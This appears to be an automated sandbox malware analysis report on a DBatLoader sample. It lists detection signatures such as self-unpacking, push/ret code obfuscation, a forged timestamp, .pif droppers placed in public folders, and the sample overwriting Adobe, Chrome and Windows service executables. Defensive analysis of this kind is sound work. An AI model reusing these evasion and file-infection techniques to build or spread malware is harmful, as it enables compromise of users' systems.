Source:	Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack

Yara detected DBatLoader

Source: Yara match

File source: 4.2.x.exe.2af0000.0.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: wdmvmswJ.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B0894C

PE file contains sections with non-standard names

Source: alpha.pif.8.dr	Static PE information: section name: .didat
Source: Acrobat.exe.12.dr	Static PE information: section name: .didat
Source: setup.exe.12.dr	Static PE information: section name: .didat
Source: setup.exe.12.dr	Static PE information: section name: _RDATA
Source: updater.exe.12.dr	Static PE information: section name: .00cfg
Source: updater.exe.12.dr	Static PE information: section name: .voltbl
Source: updater.exe.12.dr	Static PE information: section name: _RDATA
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: .didat
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: _RDATA
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .didat
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .detourc
Source: officesvcmgr.exe.12.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.12.dr	Static PE information: section name: .00cfg
Source: chrmstp.exe.12.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.12.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.12.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.12.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.12.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.12.dr	Static PE information: section name: malloc_h
Source: setup.exe0.12.dr	Static PE information: section name: .00cfg
Source: setup.exe0.12.dr	Static PE information: section name: .gxfg
Source: setup.exe0.12.dr	Static PE information: section name: .retplne
Source: setup.exe0.12.dr	Static PE information: section name: CPADinfo
Source: setup.exe0.12.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.12.dr	Static PE information: section name: _RDATA
Source: setup.exe0.12.dr	Static PE information: section name: malloc_h
Source: armsvc.exe.12.dr	Static PE information: section name: .didat
Source: alg.exe.12.dr	Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: .gehcont
Source: FXSSVC.exe.12.dr	Static PE information: section name: .didat
Source: elevation_service.exe.12.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.12.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.12.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.12.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.12.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.12.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.12.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.12.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.12.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.12.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.12.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.12.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: .gehcont
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .retplne
Source: msdtc.exe.12.dr	Static PE information: section name: .didat
Source: msiexec.exe.12.dr	Static PE information: section name: .didat
Source: MsSense.exe.12.dr	Static PE information: section name: .didat
Source: Spectrum.exe.12.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.12.dr	Static PE information: section name: .didat
Source: unpack200.exe.12.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.12.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.12.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.12.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.12.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr	Static PE information: section name: malloc_h
Source: setup.exe1.12.dr	Static PE information: section name: .00cfg
Source: setup.exe1.12.dr	Static PE information: section name: .gxfg
Source: setup.exe1.12.dr	Static PE information: section name: .retplne
Source: setup.exe1.12.dr	Static PE information: section name: LZMADEC
Source: setup.exe1.12.dr	Static PE information: section name: _RDATA
Source: setup.exe1.12.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.12.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.12.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.12.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.12.dr	Static PE information: section name: malloc_h
Source: vds.exe.12.dr	Static PE information: section name: .didat
Source: VSSVC.exe.12.dr	Static PE information: section name: .didat
Source: WmiApSrv.exe.12.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.12.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.12.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D2FC push 02B1D367h; ret	4_2_02B1D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF63AE push 02AF640Bh; ret	4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF63B0 push 02AF640Bh; ret	4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF332C push eax; ret	4_2_02AF3368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C378 push 02B1C56Eh; ret	4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC349 push 8B02AFC1h; ret	4_2_02AFC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D0AC push 02B1D125h; ret	4_2_02B1D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0306B push 02B030B9h; ret	4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0306C push 02B030B9h; ret	4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D1F8 push 02B1D288h; ret	4_2_02B1D280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0F108 push ecx; mov dword ptr [esp], edx	4_2_02B0F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D144 push 02B1D1ECh; ret	4_2_02B1D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF6784 push 02AF67C6h; ret	4_2_02AF67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF6782 push 02AF67C6h; ret	4_2_02AF67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFD5A0 push 02AFD5CCh; ret	4_2_02AFD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C570 push 02B1C56Eh; ret	4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC56C push ecx; mov dword ptr [esp], edx	4_2_02AFC571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0AAE0 push 02B0AB18h; ret	4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08AD8 push 02B08B10h; ret	4_2_02B08B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0AADF push 02B0AB18h; ret	4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B64A50 push eax; ret	4_2_02B64B20
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFCBEC push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0886C push 02B088AEh; ret	4_2_02B088A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC98E push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC9DE push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0790C push 02B07989h; ret	4_2_02B07981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B06946 push 02B069F3h; ret	4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B06948 push 02B069F3h; ret	4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B05E7C push ecx; mov dword ptr [esp], edx	4_2_02B05E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B02F60 push 02B02FD6h; ret	4_2_02B02FCE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0041C40C push cs; iretd	12_1_0041C4E2

Source: Acrobat.exe.12.dr	Static PE information: section name: .reloc entropy: 7.857629901541196
Source: setup.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.644733541214545
Source: Aut2exe.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.800655098270515
Source: Aut2exe_x64.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.800507924806883
Source: AutoIt3_x64.exe.12.dr	Static PE information: section name: .reloc entropy: 7.943934980231315
Source: appvcleaner.exe.12.dr	Static PE information: section name: .reloc entropy: 7.935643965778136
Source: SciTE.exe.12.dr	Static PE information: section name: .reloc entropy: 7.9123163296469805
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: .reloc entropy: 7.926768905035472
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .reloc entropy: 7.716531028347558
Source: officesvcmgr.exe.12.dr	Static PE information: section name: .reloc entropy: 7.937221399929087
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .reloc entropy: 7.940586616723075
Source: chrmstp.exe.12.dr	Static PE information: section name: .reloc entropy: 7.941023886348422
Source: setup.exe0.12.dr	Static PE information: section name: .reloc entropy: 7.941032370435357
Source: AppVClient.exe.12.dr	Static PE information: section name: .reloc entropy: 7.936523067479569
Source: jucheck.exe.12.dr	Static PE information: section name: .reloc entropy: 7.931078087310504
Source: jusched.exe.12.dr	Static PE information: section name: .reloc entropy: 7.936052797736743
Source: FXSSVC.exe.12.dr	Static PE information: section name: .reloc entropy: 7.942279833740998
Source: elevation_service.exe.12.dr	Static PE information: section name: .reloc entropy: 7.943952204055294
Source: elevation_service.exe0.12.dr	Static PE information: section name: .reloc entropy: 7.945964485826929
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93477484000238
Source: SensorDataService.exe.12.dr	Static PE information: section name: .reloc entropy: 7.935383609926094
Source: Spectrum.exe.12.dr	Static PE information: section name: .reloc entropy: 7.945453569107587
Source: identity_helper.exe.12.dr	Static PE information: section name: .reloc entropy: 7.940737618189385
Source: setup.exe1.12.dr	Static PE information: section name: .reloc entropy: 7.944730680089531
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93656284710181
Source: AgentService.exe.12.dr	Static PE information: section name: .reloc entropy: 7.937129466044474
Source: vds.exe.12.dr	Static PE information: section name: .reloc entropy: 7.94107270673957
Source: VSSVC.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93954260709988
Source: wbengine.exe.12.dr	Static PE information: section name: .reloc entropy: 7.941290670440269
Source: wmpnetwk.exe.12.dr	Static PE information: section name: .reloc entropy: 7.946616363744485
Source: SearchIndexer.exe.12.dr	Static PE information: section name: .reloc entropy: 7.945863668494267

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
